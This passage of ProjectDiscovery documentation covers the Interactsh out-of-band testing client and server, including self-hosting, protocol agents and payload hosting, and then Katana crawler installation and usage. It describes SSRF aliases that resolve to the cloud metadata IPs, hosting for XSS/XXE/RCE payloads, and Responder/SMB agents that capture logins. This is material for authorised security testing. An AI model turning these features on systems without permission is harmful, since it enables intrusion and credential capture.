[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received HTTP interaction from 43.22.22.50 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (MX) from 43.3.192.3 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received DNS interaction (TXT) from 74.32.183.135 at 2021-26-26 12:26
[c23b2la0kl1krjcrdj10cndmnioyyyyyn] Received SMTP interaction from 32.85.166.50 at 2021-26-26 12:26
```
## Verbose Mode
Running `interactsh-client` in **verbose mode** (`-v`) allows you to see the whole request and response, along with writing an output file to analyze afterwards.
```console
interactsh-client -v -o interactsh-logs.txt
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ 1.0.3
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c58bduhe008dovpvhvugcfemp9yyyyyyn.oast.pro
[c58bduhe008dovpvhvugcfemp9yyyyyyn] Received HTTP interaction from 103.22.142.211 at 2021-09-26 18:08:07
------------
HTTP Request
------------
GET /favicon.ico HTTP/2.0
Host: c58bduhe008dovpvhvugcfemp9yyyyyyn.oast.pro
Referer: https://c58bduhe008dovpvhvugcfemp9yyyyyyn.oast.pro
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
-------------
HTTP Response
-------------
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Server: oast.pro
nyyyyyy9pmefcguvhvpvod800ehudb85c
```
## Choosing a Server
When running `interactsh-client`, it must be able to connect to a running `interactsh-server`. The Interactsh server captures and logs out-of-band interactions, while the client generates testing URLs and analyzes these interactions for vulnerabilities.
You can either use one of ProjectDiscovery's default Interactsh servers or run a self-hosted server.
### ProjectDiscovery Interactsh servers
We maintain a list of default Interactsh servers to use with `interactsh-client`:
* oast.pro
* oast.live
* oast.site
* oast.online
* oast.fun
* oast.me
Default servers may change, rotate, or go down at any time, so we recommend using a self-hosted Interactsh server if you are experiencing issues with the default servers.
### Self-Hosted interactsh Server
Using the `server` flag, `interactsh-client` can be configured to connect to a self-hosted Interactsh server. This flag accepts a single server or multiple servers separated by commas.
```sh
interactsh-client -server hackwithautomation.com
```
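Since the flag accepts comma-separated values, multiple servers can be supplied in one invocation; for example, mixing a self-hosted server with one of the default servers (hostnames here are illustrative):
```sh
interactsh-client -server hackwithautomation.com,oast.fun
```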
**Using a Protected Self-Hosted Server**
Using the `token` flag, `interactsh-client` can connect to a self-hosted Interactsh server that is protected with authentication.
```sh
interactsh-client -server hackwithautomation.com -token XXX
```
## Using with Notify
If you are away from your terminal, you may use [notify](https://github.com/projectdiscovery/notify) to send a real-time interaction notification to any supported platform.
```sh
interactsh-client | notify
```
![image](https://user-images.githubusercontent.com/8293321/116283535-9bcac180-a7a9-11eb-94d5-0313d4812fef.png)
## Interactsh Web Client
[Interactsh-web](https://github.com/projectdiscovery/interactsh-web) is a free and open-source web client that displays Interactsh interactions in a well-managed dashboard in your browser. It uses the browser's local storage to store and display all incoming interactions. By default, the web client is configured to use **interact.sh** as the Interactsh server, and it also supports other self-hosted public/authenticated Interactsh servers.
A hosted instance of **interactsh-web** client is available at [https://app.interactsh.com](https://app.interactsh.com)
![image](https://user-images.githubusercontent.com/8293321/136621531-d72c9ece-0076-4db1-98c9-21dcba4ba09c.png)
## Interactsh Docker Client
A [Docker image](https://hub.docker.com/r/projectdiscovery/interactsh-client) of the Interactsh client is also provided; it is ready to run and can be used in the following way:
```sh
docker run projectdiscovery/interactsh-client:latest
```
```console
docker run projectdiscovery/interactsh-client:latest
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.oast.pro
```
## Integrations
### Burp Suite Extension
See [integrations](/tools/interactsh/integrations) for more details on the [interactsh-collaborator](https://github.com/wdahlenburg/interactsh-collaborator).
### ZAP Add-On
See [integrations](/tools/interactsh/integrations) for more details on using interactsh with ZAP.
### Use as library
The [examples](https://github.com/projectdiscovery/interactsh/tree/main/examples) show how to use the Interactsh client library to retrieve external interactions for a generated URL by making an HTTP request to that URL.
### Nuclei - OAST
The [Nuclei](https://github.com/projectdiscovery/nuclei) vulnerability scanner utilizes **Interactsh** for automated payload generation and detection of out-of-band security vulnerabilities.
See [Nuclei + Interactsh](https://blog.projectdiscovery.io/nuclei-interactsh-integration/) Integration blog and [guide document](https://docs.projectdiscovery.io/templates/reference/oob-testing) for more information.
## Cloud Metadata
Interactsh server supports DNS records for cloud metadata services, which is useful for testing SSRF-related vulnerabilities.
Currently supported metadata services:
* [AWS](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)
* [Alibaba](https://www.alibabacloud.com/blog/alibaba-cloud-ecs-metadata-user-data-and-dynamic-data_594351)
Example:
* **aws.interact.sh** points to 169.254.169.254
* **alibaba.interact.sh** points to 100.100.100.200
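You can verify these records with a quick DNS lookup; a sketch assuming `dig` is installed and the interact.sh records are live as documented above:
```sh
dig +short A aws.interact.sh
# 169.254.169.254
dig +short A alibaba.interact.sh
# 100.100.100.200
```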
# Interactsh Server
Source: https://docs.projectdiscovery.io/tools/interactsh/server
Learn about self-hosting an interactsh server
## Interactsh Server
Interactsh server runs multiple services and captures all the incoming requests. To host an instance of **interactsh-server**, you need to set up:
1. A domain name with custom **host names** and **nameservers**.
2. A basic droplet (or similar VPS) running 24/7 in the background.
## Usage
```sh
interactsh-server -h
```
This will display help for the tool. Here are all the switches it supports.
```yaml
Usage:
./interactsh-server [flags]
Flags:
INPUT:
-d, -domain string[] single/multiple configured domain to use for server
-ip string public ip address to use for interactsh server
-lip, -listen-ip string public ip address to listen on (default "0.0.0.0")
-e, -eviction int number of days to persist interaction data in memory (default 30)
-ne, -no-eviction disable periodic data eviction from memory
-a, -auth enable authentication to server using random generated token
-t, -token string enable authentication to server using given token
-acao-url string origin url to send in acao header to use web-client) (default "*")
-sa, -skip-acme skip acme registration (certificate checks/handshake + TLS protocols will be disabled)
-se, -scan-everywhere scan canary token everywhere
-cidl, -correlation-id-length int length of the correlation id preamble (default 20)
-cidn, -correlation-id-nonce-length int length of the correlation id nonce (default 13)
-cert string custom certificate path
-privkey string custom private key path
-oih, -origin-ip-header string HTTP header containing origin ip (interactsh behind a reverse proxy)
CONFIG:
-config string flag configuration file (default "$HOME/.config/interactsh-server/config.yaml")
-dr, -dynamic-resp enable setting up arbitrary response data
-cr, -custom-records string custom dns records YAML file for DNS server
-hi, -http-index string custom index file for http server
-hd, -http-directory string directory with files to serve with http server
-ds, -disk disk based storage
-dsp, -disk-path string disk storage path
-csh, -server-header string custom value of Server header in response
-dv, -disable-version disable publishing interactsh version in response header
UPDATE:
-up, -update update interactsh-server to latest version
-duc, -disable-update-check disable automatic interactsh-server update check
SERVICES:
-dns-port int port to use for dns service (default 53)
-http-port int port to use for http service (default 80)
-https-port int port to use for https service (default 443)
-smtp-port int port to use for smtp service (default 25)
-smtps-port int port to use for smtps service (default 587)
-smtp-autotls-port int port to use for smtps autotls service (default 465)
-ldap-port int port to use for ldap service (default 389)
-ldap enable ldap server with full logging (authenticated)
-wc, -wildcard enable wildcard interaction for interactsh domain (authenticated)
-smb start smb agent - impacket and python 3 must be installed (authenticated)
-responder start responder agent - docker must be installed (authenticated)
-ftp start ftp agent (authenticated)
-smb-port int port to use for smb service (default 445)
-ftp-port int port to use for ftp service (default 21)
-ftp-dir string ftp directory - temporary if not specified
DEBUG:
-version show version of the project
-debug start interactsh server in debug mode
-ep, -enable-pprof enable pprof debugging server
-health-check, -hc run diagnostic check up
-metrics enable metrics endpoint
-v, -verbose display verbose interaction
```
## Getting started
### Configuring Interactsh domain
For this example, we will use GoDaddy for domain registration and a DigitalOcean droplet as the server; a basic \$5 droplet efficiently supports a self-hosted Interactsh server. If you use different providers, please follow your registrar's guidelines for creating or updating DNS entries.
* Navigate to `https://dcc.godaddy.com/manage/{{domain}}/dns/hosts`
* Advanced Features → Host names → Add → Submit `ns1`, `ns2` with your `SERVER_IP` as value
![image](https://user-images.githubusercontent.com/8293321/135175512-135259fb-0490-4038-845a-0b62b1b8f549.png)
* Navigate to `https://dns.godaddy.com/{{domain}}/nameservers`
* Click "I'll use my own nameservers" → Submit `ns1.INTERACTSH_DOMAIN`, `ns2.INTERACTSH_DOMAIN`
![image](https://user-images.githubusercontent.com/8293321/135175627-ea9639fd-353d-441b-a9a4-dae7f540d0ae.png)
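Once the registrar changes propagate, you can optionally confirm the delegation before starting the server. A quick check assuming `dig` is available; replace `INTERACTSH_DOMAIN` and `SERVER_IP` with your own values:
```sh
# the domain's nameservers should point to your self-hosted hosts
dig +short NS INTERACTSH_DOMAIN
# ns1.INTERACTSH_DOMAIN.
# ns2.INTERACTSH_DOMAIN.

# the ns records should resolve to the droplet's public IP
dig +short A ns1.INTERACTSH_DOMAIN
# SERVER_IP
```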
### Configuring Interactsh server
Install `interactsh-server` on your **VPS**
```bash
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest
```
Once the domain name setup is **completed**, run the command below to start `interactsh-server`:
```bash
interactsh-server -domain INTERACTSH_DOMAIN
```
Following is an example of a successful installation and operation of a self-hosted server:
![image](https://user-images.githubusercontent.com/8293321/150676089-b5638c19-33a3-426a-987c-3ac6fa227012.png)
A number of required flags are configured automatically when running `interactsh-server` with default settings. For example, the `ip` and `listen-ip` flags are set to the public IP address of the system when possible.
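If automatic detection does not pick the right address (for example, on a NATed VM), these values can be set explicitly using the `-ip` and `-listen-ip` flags documented above; an illustrative invocation:
```sh
interactsh-server -domain INTERACTSH_DOMAIN -ip SERVER_IP -listen-ip 0.0.0.0
```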
### Running Interactsh Server
```console
interactsh-server -domain interact.sh
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Listening with the following services:
[HTTPS] Listening on TCP 46.101.25.250:443
[HTTP] Listening on TCP 46.101.25.250:80
[SMTPS] Listening on TCP 46.101.25.250:587
[LDAP] Listening on TCP 46.101.25.250:389
[SMTP] Listening on TCP 46.101.25.250:25
[DNS] Listening on TCP 46.101.25.250:53
[DNS] Listening on UDP 46.101.25.250:53
```
## Additional Server Options
### Using Multiple Domains
Multiple domain names can be given in the same way as above to run the same interactsh server across multiple **configured domains**.
```console
interactsh-server -d oast.pro,oast.me
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ 1.0.5
projectdiscovery.io
[INF] Loading existing SSL Certificate for: [*.oast.pro, oast.pro]
[INF] Loading existing SSL Certificate for: [*.oast.me, oast.me]
[INF] Listening with the following services:
[HTTPS] Listening on TCP 46.101.25.250:443
[HTTP] Listening on TCP 46.101.25.250:80
[SMTPS] Listening on TCP 46.101.25.250:587
[LDAP] Listening on TCP 46.101.25.250:389
[SMTP] Listening on TCP 46.101.25.250:25
[DNS] Listening on TCP 46.101.25.250:53
[DNS] Listening on UDP 46.101.25.250:53
```
When running the Interactsh server on **cloud VMs** such as Amazon EC2 or Google Cloud Platform (GCP), you must update the security rules to allow **"all traffic"** for inbound connections.
There are more useful capabilities supported by `interactsh-server` that are not enabled by default and are intended to be used only by **self-hosted** servers.
### Hosting behind a reverse proxy
`interactsh-server` might require custom ports for its services if the default ones are already in use. If that is the case, but the default ports are still required as part of the payload, `interactsh-server` can be placed behind a reverse proxy by port-forwarding the HTTP/TCP/UDP based services via `http`/`stream` proxy directives (`proxy_pass`).
### Nginx
Assuming that `interactsh-server` essential services run on the following ports:
* HTTP: 8080/TCP
* HTTPS: 8440/TCP
* SMTP: 8025/TCP
* DNS: 8053/UDP
* DNS: 8053/TCP
The nginx configuration file to forward the traffic would look like the following one:
```conf
# http/https
http {
    server {
        listen 443 ssl;
        server_name mysite.com;

        ssl_certificate /etc/nginx/interactsh.pem;
        ssl_certificate_key /etc/nginx/interactsh.key;

        location / {
            proxy_pass https://interactsh.mysite.com:8440/;
            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            proxy_set_header X-Forwarded-Proto $scheme;
        }
    }
}

stream {
    # smtp
    server {
        listen 25;
        proxy_pass interactsh.mysite.com:8025;
    }

    # dns
    server {
        listen 53;
        proxy_pass interactsh.mysite.com:8053;
    }
    server {
        listen 53 udp;
        proxy_pass interactsh.mysite.com:8053;
    }
}
```
## Hosting Additional Data
### Custom Server Index
The index page for the HTTP server can be customized when running a custom Interactsh server by using the `-http-index` flag.
```console
interactsh-server -d hackwithautomation.com -http-index banner.html
```
The `{DOMAIN}` placeholder is also supported in the index file; it is replaced with the server's domain name.
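For example, a minimal index file using the placeholder might look like this (the file name and contents are illustrative):
```sh
cat > banner.html <<'EOF'
<html>
  <body>
    <h1>Interactsh server for {DOMAIN}</h1>
  </body>
</html>
EOF
interactsh-server -d hackwithautomation.com -http-index banner.html
```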
![image](https://user-images.githubusercontent.com/8293321/179397016-f6ee12e0-5b0b-42b6-83e7-f0972a804655.png)
### Static File Hosting
The Interactsh HTTP server optionally enables file hosting to help with security testing. This capability can be used with a self-hosted server to serve files for common payloads for **XSS, XXE, RCE** and other attacks.
To use this feature, the `-http-directory` flag can be used; it accepts a directory as input, and files are served under the `/s/` path.
```console
interactsh-server -d hackwithautomation.com -http-directory ./payloads
```
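Once the server is up, hosted files are reachable under the `/s/` path; a sketch of serving and then fetching a payload (file and directory names are illustrative):
```sh
mkdir -p payloads
echo 'alert(document.domain)' > payloads/xss.js
interactsh-server -d hackwithautomation.com -http-directory ./payloads

# from the tester's machine
curl https://hackwithautomation.com/s/xss.js
```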
![image](https://user-images.githubusercontent.com/8293321/179396480-d5ff8399-8b91-48aa-b21f-c67e40e80945.png)
### Dynamic HTTP Response
The Interactsh HTTP server can optionally respond with dynamic HTTP responses driven by query parameters. This feature can be enabled with the `-dr` or `-dynamic-resp` flag.
The following query parameter names are supported: `body`, `header`, `status` and `delay`. Multiple `header` parameters can be specified to set multiple headers.
* **body** (response body)
* **header** (response header)
* **status** (response status code)
* **delay** (response time)
```console
curl -i 'https://hackwithautomation.com/x?status=307&body=this+is+example+body&delay=1&header=header1:value1&header=header1:value12'
HTTP/2 307
header1: value1
header1: value12
server: hackwithautomation.com
x-interactsh-version: 1.0.7
content-type: text/plain; charset=utf-8
content-length: 20
date: Tue, 13 Sep 2022 12:31:05 GMT
this is example body
```
> **Note**:
* The Dynamic HTTP Response feature is disabled by default.
* By design, this feature lets anyone run client-side code / redirects using your Interactsh domain / server.
* Using this option with an isolated domain is recommended to **avoid security impact** on associated root/subdomains.
## Wildcard Interaction
To enable `wildcard` interaction for a configured Interactsh domain, the `wildcard` flag can be used; authentication protection is implicitly enabled via the `auth` flag if the `token` flag is omitted.
```console
interactsh-server -domain hackwithautomation.com -wildcard
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Client Token: 699c55544ce1604c63edb769e51190acaad1f239589a35671ccabd664385cfc7
[INF] Listening with the following services:
[HTTPS] Listening on TCP 157.230.223.165:443
[HTTP] Listening on TCP 157.230.223.165:80
[SMTPS] Listening on TCP 157.230.223.165:587
[LDAP] Listening on TCP 157.230.223.165:389
[SMTP] Listening on TCP 157.230.223.165:25
[DNS] Listening on TCP 157.230.223.165:53
[DNS] Listening on UDP 157.230.223.165:53
```
## Advanced Options
### Custom Payload Length
The length of the Interactsh payload is **33** by default, consisting of **20** characters (unique correlation ID) + **13** characters (nonce token). This can be customized using the `cidl` and `cidn` flags to make the payload shorter when required with a self-hosted Interactsh server.
```console
interactsh-server -d hackwithautomation.com -cidl 4 -cidn 6
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.2
projectdiscovery.io
[INF] Loading existing SSL Certificate for: [*.hackwithautomation.com, hackwithautomation.com]
[INF] Listening with the following services:
[HTTPS] Listening on TCP 157.230.223.165:443
[SMTPS] Listening on TCP 157.230.223.165:587
[DNS] Listening on UDP 157.230.223.165:53
[HTTP] Listening on TCP 157.230.223.165:80
[LDAP] Listening on TCP 157.230.223.165:389
[SMTP] Listening on TCP 157.230.223.165:25
[DNS] Listening on TCP 157.230.223.165:53
```
**Note:** It is required to use the same lengths on both sides (**client** and **server**), otherwise correlation will not work.
```console
interactsh-client -s hackwithautomation.com -cidl 4 -cidn 6
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.2
projectdiscovery.io
[INF] Listing 1 payload for OOB Testing
[INF] c8rf4e8xm4.hackwithautomation.com
```
### Custom SSL Certificate
The [certmagic](https://github.com/caddyserver/certmagic) library is used by default by the Interactsh server to automatically produce wildcard certificates for the requested domain. To use your own SSL certificate with a self-hosted Interactsh server, the `cert` and `privkey` flags can be used to provide the required certificate files.
**Note:** To utilize all of the functionality of the SSL protocol, a wildcard certificate is mandatory.
```console
interactsh-server -d hackwithautomation.com -cert hackwithautomation.com.crt -privkey hackwithautomation.com.key
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.2
projectdiscovery.io
[INF] Listening with the following services:
[HTTPS] Listening on TCP 157.230.223.165:443
[SMTP] Listening on TCP 157.230.223.165:25
[HTTP] Listening on TCP 157.230.223.165:80
[LDAP] Listening on TCP 157.230.223.165:389
[DNS] Listening on TCP 157.230.223.165:53
[SMTPS] Listening on TCP 157.230.223.165:587
[DNS] Listening on UDP 157.230.223.165:53
```
## Supported Protocols
### LDAP
By default, the Interactsh server supports LDAP interaction for payloads included in a [search query](https://ldapwiki.com/wiki/LDAP%20Query%20Examples); additionally, the `ldap` flag can be used for complete logging.
```console
interactsh-server -domain hackwithautomation.com -sa -ldap
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v1.0.0
projectdiscovery.io
[INF] Client Token: deb58fc151e6f0e53d448be3eb14cd7a11590d8950d142b9cd1abac3c2e3e7bc
[INF] Listening with the following services:
[DNS] Listening on UDP 157.230.223.165:53
[LDAP] Listening on TCP 157.230.223.165:389
[HTTP] Listening on TCP 157.230.223.165:80
[SMTP] Listening on TCP 157.230.223.165:25
[DNS] Listening on TCP 157.230.223.165:53
```
### FTP
FTP support can be enabled with the `-ftp` flag and is recommended for self-hosted instances only. The FTP agent simulates a fully functional FTP server with authentication and captures authentication attempts along with every file operation. By default, the agent listens on port 21 (this can be changed with the `-ftp-port` flag) and lists, in read-only mode, the contents of the OS default temporary directory (customizable with the `-ftp-dir` option).
Example of starting the FTP daemon and capturing a login interaction:
```console
$ sudo go run . -ftp -skip-acme -debug -domain localhost
...
[INF] Outbound IP: 192.168.1.16
[INF] Client Token: 6dc07e4a76c3d5e58e4bea13ce073dc403499b128c62397aff7b934a6e4822e3
[INF] Listening with the following services:
[DNS] Listening on TCP 192.168.1.16:53
[SMTP] Listening on TCP 192.168.1.16:25
[HTTP] Listening on TCP 192.168.1.16:80
[FTP] Listening on TCP 192.168.1.16:21
[DNS] Listening on UDP 192.168.1.16:53
[LDAP] Listening on TCP 192.168.1.16:389
[DBG] FTP Interaction:
{"protocol":"ftp","unique-id":"","full-id":"","raw-request":"USER test\ntest logging in","remote-address":"127.0.0.1:51564","timestamp":"2022-09-29T00:49:42.212323+02:00"}
```
### SMB
The `-smb` flag enables the SMB (Samba) protocol (only for self-hosted instances). The SMB agent uses the [impacket](https://github.com/SecureAuthCorp/impacket) `smbserver` class to simulate a Samba share listening on port `445`, unless changed with the `-smb-port` flag. When enabled, Interactsh executes the script `smb_server.py` under the hood, so Python 3 and the impacket dependency are required.
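Python 3 and the impacket dependency can be installed with pip, for example (assuming `pip3` is already present on the host):
```sh
pip3 install impacket
```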
Example of enabling the samba server:
```console
$ sudo interactsh-server -smb -skip-acme -debug -domain localhost
```
### Responder
[Responder](https://github.com/lgandx/Responder) is wrapped in a Docker container exposing various service ports via Docker port forwarding. The interactions are retrieved by monitoring the shared log file `Responder-Session.log` in the temp folder. To use it on a self-hosted instance, it is first necessary to build the Docker container and tag it as `interactsh` (the Docker daemon must be configured correctly, with port forwarding capabilities):
```console
docker build . -t interactsh
```
Then run the service with:
```console
$ sudo interactsh-server -responder -d localhost
```
On default settings, the daemon listens on the following ports:
* UDP: 137, 138, 1434
* TCP: 21 (might collide with FTP daemon if used), 110, 135, 139, 389, 445, 1433, 3141, 3128
# Interactsh Usage
Source: https://docs.projectdiscovery.io/tools/interactsh/usage
Learn Interactsh usage including flags and filters
## Access help
Use `interactsh-client -h` to display all of the help options.
## Interactsh options
```yaml
Usage:
./interactsh-client [flags]
Flags:
INPUT:
-s, -server string interactsh server(s) to use (default "oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me")
CONFIG:
-config string flag configuration file (default "$HOME/.config/interactsh-client/config.yaml")
-n, -number int number of interactsh payload to generate (default 1)
-t, -token string authentication token to connect protected interactsh server
-pi, -poll-interval int poll interval in seconds to pull interaction data (default 5)
-nf, -no-http-fallback disable http fallback registration
-cidl, -correlation-id-length int length of the correlation id preamble (default 20)
-cidn, -correlation-id-nonce-length int length of the correlation id nonce (default 13)
-sf, -session-file string store/read from session file
FILTER:
-m, -match string[] match interaction based on the specified pattern
-f, -filter string[] filter interaction based on the specified pattern
-dns-only display only dns interaction in CLI output
-http-only display only http interaction in CLI output
-smtp-only display only smtp interactions in CLI output
UPDATE:
-up, -update update interactsh-client to latest version
-duc, -disable-update-check disable automatic interactsh-client update check
OUTPUT:
-o string output file to write interaction data
-json write output in JSONL(ines) format
-ps, -payload-store enable storing generated interactsh payload to file
-psf, -payload-store-file string store generated interactsh payloads to given file (default "interactsh_payload.txt")
-v display verbose interaction
DEBUG:
-version show version of the project
-health-check, -hc run diagnostic check up
```
# Installing Katana
Source: https://docs.projectdiscovery.io/tools/katana/install
Learn about how to install Katana
Enter the command below in a terminal to install ProjectDiscovery's Katana using Go.
```bash
go install github.com/projectdiscovery/katana/cmd/katana@latest
```
Enter the command below in a terminal to install ProjectDiscovery's Katana using Docker.
To install/update to the latest Docker tag:
```bash
docker pull projectdiscovery/katana:latest
```
Enter the command below in a terminal to install ProjectDiscovery's Katana using GitHub.
```bash
go install github.com/projectdiscovery/katana/cmd/katana@latest
```
If you are running Ubuntu, we recommend installing the following prerequisites:
```sh
sudo apt update
sudo snap refresh
sudo apt install zip curl wget git
sudo snap install golang --classic
wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
sudo apt update
sudo apt install google-chrome-stable
```
```bash
https://github.com/projectdiscovery/katana/releases
```
* Download the latest binary for your OS.
* Unzip the file to run the binary.
## Installation Notes
* Katana requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On macOS or Linux, run the following in your terminal:
```
echo 'export PATH=$PATH:$HOME/go/bin' >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$HOME/go/bin/katana`
# Katana Overview
Source: https://docs.projectdiscovery.io/tools/katana/overview
A web crawling framework designed to navigate and parse for hidden details
## What is **Katana?**
Katana is a command-line interface (CLI) web crawling tool written in Golang, designed to be fast, efficient, and provide simple output.
It is designed to crawl websites to gather information and endpoints. One of its defining features is the ability to use headless browsing to crawl applications.
This means that it can crawl single-page applications (SPAs) built using technologies such as JavaScript, Angular, or React to effectively access and gather information from these types of applications.
* Check [out this great ProjectDiscovery blog post](https://blog.projectdiscovery.io/introducing-katana-the-best-cli-web-crawler/) from the initial launch for more information on Katana.
* We also [wrote a great “deep dive” blog](https://blog.projectdiscovery.io/a-deep-dive-on-katana-field-extraction/) on Katana’s field extraction
## Features and capabilities
* Fast and fully configurable web crawling
* Support for Standard and Headless modes
* JavaScript parsing and crawling support
* Customizable automatic form-filling
* Customizable output through preconfigured fields
* Customizable scope control through preconfigured fields and Regex
* Support Inputs through STDIN, URL, and LIST
* Supported Outputs of STDOUT, FILE, and JSON
## Additional Katana resources
As an open-source tool with a robust community, there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://medium.com/@sherlock297/katana-framework-how-to-use-it-to-scan-and-mass-collect-website-data-107f5ae326e0](https://medium.com/@sherlock297/katana-framework-how-to-use-it-to-scan-and-mass-collect-website-data-107f5ae326e0)
* [https://medium.com/@cuncis/katana-an-overview-of-the-powerful-web-application-security-scanner-cheat-sheet-6fc50236aff6](https://medium.com/@cuncis/katana-an-overview-of-the-powerful-web-application-security-scanner-cheat-sheet-6fc50236aff6)
* [https://www.geeksforgeeks.org/katana-crawling-and-spidering-framework/](https://www.geeksforgeeks.org/katana-crawling-and-spidering-framework/)
## Support
Questions about using Katana? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running Katana
Source: https://docs.projectdiscovery.io/tools/katana/running
Learn about running Katana with examples including commands and output
For all of the flags and options available for Katana be sure to check out the [Usage](/tools/katana/usage) page.
On this page we share examples of Katana with specific flags and goals and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Running Katana
Katana requires a URL or endpoint to crawl and accepts single or multiple inputs.
### Input for katana
A URL can be provided using the `-u` option, and multiple values can be provided as comma-separated input. Similarly, file input is supported using the `-list` option, and piped input (stdin) is also supported.
#### URL Input
```sh
katana -u https://tesla.com
```
#### Multiple URL Input (comma-separated)
```sh
katana -u https://tesla.com,https://google.com
```
#### List Input
```bash
$ cat url_list.txt
https://tesla.com
https://google.com
```
```
katana -list url_list.txt
```
#### STDIN (piped) Input
```sh
echo https://tesla.com | katana
```
```sh
cat domains | httpx | katana
```
Example running katana -
```console
katana -u https://youtube.com
__ __
/ /_____ _/ /____ ____ ___ _
/ '_/ _ / __/ _ / _ \/ _ /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/ v0.0.1
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
https://www.youtube.com/
https://www.youtube.com/about/
https://www.youtube.com/about/press/
https://www.youtube.com/about/copyright/
https://www.youtube.com/t/contact_us/
https://www.youtube.com/creators/
https://www.youtube.com/ads/
https://www.youtube.com/t/terms
https://www.youtube.com/t/privacy
https://www.youtube.com/about/policies/
https://www.youtube.com/howyoutubeworks?utm_campaign=ytgen&utm_source=ythp&utm_medium=LeftNav&utm_content=txt&u=https%3A%2F%2Fwww.youtube.com%2Fhowyoutubeworks%3Futm_source%3Dythp%26utm_medium%3DLeftNav%26utm_campaign%3Dytgen
https://www.youtube.com/new
https://m.youtube.com/
https://www.youtube.com/s/desktop/4965577f/jsbin/desktop_polymer.vflset/desktop_polymer.js
https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-home-page-skeleton.css
https://www.youtube.com/s/desktop/4965577f/cssbin/www-onepick.css
https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.0Zo5FUcPkCg.L.B1.O/am=gAE/d=0/rs=AGKMywG5nh5Qp-BGPbOaI1evhF5BVGRZGA
https://www.youtube.com/opensearch?locale=en_GB
https://www.youtube.com/manifest.webmanifest
https://www.youtube.com/s/desktop/4965577f/cssbin/www-main-desktop-watch-page-skeleton.css
https://www.youtube.com/s/desktop/4965577f/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js
